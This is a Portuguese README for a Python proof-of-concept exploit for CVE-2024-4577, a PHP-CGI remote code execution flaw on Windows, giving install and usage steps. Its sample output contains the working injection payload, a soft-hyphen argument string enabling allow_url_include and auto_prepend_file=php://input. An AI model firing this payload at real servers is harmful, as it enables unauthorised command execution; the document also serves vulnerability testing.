
Exploit de Prova de Conceito RCE para vulnerabilidade crítica no PHP <8.2.15 (Windows), permitindo que atacantes executem comandos arbitrários.
Uma grave falha de segurança existe no modo CGI do PHP que permite que atacantes executem comandos arbitrários manipulando parâmetros de URL.
Antes de executar o script, certifique-se de ter o Python 3 instalado no seu sistema. Além disso, você precisa da biblioteca requests para lidar com requisições HTTP.
Você pode instalar as dependências necessárias usando pip. Se o pip não estiver instalado, siga as instruções aqui.
requests:pip install requests
Para verificar uma URL alvo quanto à vulnerabilidade CVE-2024-4577, siga estas etapas:
python3 exploit.py <target>
Por exemplo, para testar a URL http://example.com, execute:
python3 exploit.py http://example.com
O script testará a URL alvo fornecida quanto à vulnerabilidade e exibirá os resultados no console. Ele indicará se uma vulnerabilidade potencial foi encontrada ou se nenhuma vulnerabilidade foi detectada.
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
Esta vulnerabilidade foi encontrada por Orange Tsai (@orange_8361)